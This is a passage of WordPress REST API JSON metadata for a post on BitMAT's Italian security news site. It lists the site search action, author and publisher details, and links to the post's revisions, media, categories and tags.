privacy.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.bitmat.it\/specialesicurezza\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Person","@id":"https:\/\/www.bitmat.it\/specialesicurezza\/#\/schema\/person\/4cd1e4627f78f4fbed810748dc1a20d4","name":"Redazione BitMAT","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/cc68cb64f5606ebc4c95ec5b02440c57fc7d268268e5dd8c1cac7ec09ec07ac9?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/cc68cb64f5606ebc4c95ec5b02440c57fc7d268268e5dd8c1cac7ec09ec07ac9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/cc68cb64f5606ebc4c95ec5b02440c57fc7d268268e5dd8c1cac7ec09ec07ac9?s=96&d=mm&r=g","caption":"Redazione BitMAT"},"description":"BitMAT Edizioni \u00e8 una casa editrice che ha sede a Milano con una copertura a 360\u00b0 per quanto riguarda la comunicazione rivolta agli specialisti dell'lnformation &amp; Communication Technology.","sameAs":["https:\/\/www.bitmat.it\/","https:\/\/www.facebook.com\/BitMATnews","https:\/\/x.com\/https:\/\/twitter.com\/BitMATnews"],"url":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/author\/bitmat"}]}},"_links":{"self":[{"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/posts\/5799","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/comments?post=5799"}],"version-history":[{"count":1,"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/posts\/5799\/revisions"}],"predecessor-version":[{"id":5802,"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/posts\/5799\/revisions\/5802"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/media\/5801"}],"wp:attachment":[{"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/media?parent=5799"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/categories?post=5799"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.bitmat.it\/specialesicurezza\/wp-json\/wp\/v2\/tags?post=5799"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}